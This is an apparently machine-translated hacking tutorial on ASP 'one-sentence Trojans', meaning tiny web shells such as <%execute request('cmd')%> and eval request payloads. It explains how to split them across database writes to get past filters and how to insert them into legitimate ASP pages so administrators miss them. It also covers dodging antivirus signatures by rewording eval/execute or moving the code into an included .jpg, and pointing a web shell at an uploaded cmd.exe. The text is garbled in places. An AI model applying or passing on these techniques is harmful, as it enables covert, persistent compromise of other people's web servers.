One-sentence Trojan kill-free processing

When further intrusion into the server, the uploaded files will be filtered out by the server, and the uploaded WEBSHLL will not run! Take the minimal blue screen ASP Trojan as an example! Make the following changes. The original code is % executerequest (cmd) %. Replace the label with scriptlanguageVBScriptrunatserverexecuterequest (cmd) Script.

When further intrusion into the server, the uploaded files will be filtered out by the server, and the uploaded WEBSHLL will not run!

Take the minimal blue screen ASP Trojan as an example! Make the following changes.

The original code is <%ExECutE request ("cmd") %> Replace the label

This avoids the <%, %> symbol!

Restrictions on data segments in the table, and a single Trojan cannot be written.

The smallest Trojan code circulating on the network is <%EvalRequest ("#") %> If the connection fails, what should I do?

Just write the Trojan horse separately! <% Y = request ("x") %> <% execute (Y) %> in this way, separate writes are committed to the database!

However, the physical location of the newly added data in the ACCESS database is before the old data, so you must first write the <% execute (Y) %> section. After writing the password on the client, you can enter any character except "x". If you enter "x", an error will occur!

Inserting a sentence is prone to errors.

For example

Sub unlockPost ()

DimId, Replyid, rs, posttable

Id = Request ("id ")

Replyid = Request ("replyid ")

If Not IsNumeric (id) or id = "" Then

Write

Sub unlockPost (<% eval request ("#") %>)

Dim id, replyid, rs, posttable

Id = Request ("id ")

Replyid = Request ("replyid ")

If Not IsNumeric (id) or id = "" Then

You can also write a format with a fault tolerance statement !!

<% If request ("cmd") <> "" then execute request ("cmd") %>

One-sentence Trojan to two-sentence Trojan transformation!

One-sentence Trojan server prototype: <% execute request ("value") %>,

After Deformation: <% On Error ReSuMe Next execute request ("value") %>,

Why do we need to use a Trojan Horse? It is because it makes our backdoors more concealed.

I have also tried to insert an ASP file of WellShell in one sentence, but errors often occur during access, while the Trojan server can be accessed normally after inserting two sentences, it has no effect on the page of the site.

In this way, the website is more concealed. The Administrator will not delete all the webpage files.

My WellShell now has such a backdoor. when selecting the ASP file for which you want to insert two sentences, you should note that you should select some ASP files that can be accessed by IE instead of conn. insert files such as asp.

Of course, the Client Connected to the Trojan still uses the client of the Trojan without modification.

One-sentence kill-free:

I. Deformation Method

For example, a horse like eval (request ("#") is generally not killed. But in fact, anti-virus software often lists eval (request as a signature. So let's make some changes.

E = request ("id ")

Eval (E)

In this way, the kill-free operation can be achieved.

For example: <% execute request ("1") %> after deformation:

<% E = request ("1 ")

Execute E %>

Of course, this kind of deformation is best done.

This article introduces the second method: because many administrators are very smart, they will check the execute and eval functions in ASP files. Therefore, no matter how you decompile it, it will always use one of the functions to explain the operation, so it is still found. Okay, we can use an external file to call it. Create an a.jpg or any file suffix or file name that is not found. Write execute (request ("#"), of course, you can first deform and then put it. Then insert it into the ASP file.

　　

To reference it.

However, the administrator can find the modified file by comparing the file, but this is not the case.

Use in WEBSHALLCommandPrompt

Then modify your WEBSHELL to find the code that calls CMD. EXE. The original code is as follows:

. Exec ("cmd.exe/c" & DefCmd). stdout. readall

Change

. Exec ("the absolute path of cmd.exe to be uploaded"/c "& DefCmd). stdout. readall

For example, if the directory you uploaded is D: \ web \ www \ cmd.exe, change it

. Exec ("D: \ web \ www \ cmd.exe/c" & DefCmd). stdout. readall